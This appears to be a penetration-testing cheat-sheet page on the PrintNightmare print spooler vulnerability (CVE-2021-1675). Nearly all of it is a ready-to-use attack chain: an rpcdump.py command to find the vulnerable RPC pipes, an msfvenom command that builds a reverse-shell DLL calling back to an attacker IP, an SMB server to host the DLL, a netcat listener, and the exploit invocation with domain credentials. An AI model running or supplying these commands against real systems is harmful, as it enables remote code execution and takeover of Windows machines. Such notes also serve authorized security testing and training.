PRINTNIGHTMARE

PRIMARY CATEGORY → PRINT SPOOLER SERVICE

Theory

Abuse - UNIX-like

Checking if the Target’s RPC Namedpipes are available

Impacket’s RPCDump.py

Looking for MS-RPRN or MS-PAR pipes enabled

rpcdump.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' | grep -iP --color -- 'MS-(RPRN|PAR)'

Creating a DLL Payload (Reverse Shell)

MSFVenom

msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --format dll --platform windows --arch x64 --out remote.dll

Setting up an SMB Server

Impacket’s SMBServer.py

smbserver.py -smb2support <SHARE> <LOCAL_PATH>

Setting up a Netcat Listener for the Rev. Shell

Netcat

nc -nlvp <PORT>

Running the Exploit

CVE-2021-1675.py

From the Attacker ⚔️

python3 CVE-2021-1675.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' '\\<ATTACKER>\<SHARE>\remote.dll'

💥Cyb3rBook

Explorer

PRINTNIGHTMARE

PRIMARY CATEGORY → PRINT SPOOLER SERVICE

Theory

Abuse - UNIX-like

Checking if the Target’s RPC Namedpipes are available

Creating a DLL Payload (Reverse Shell)

Setting up an SMB Server

Setting up a Netcat Listener for the Rev. Shell

Running the Exploit

Abuse - Windows

Graph View

Table of Contents

Backlinks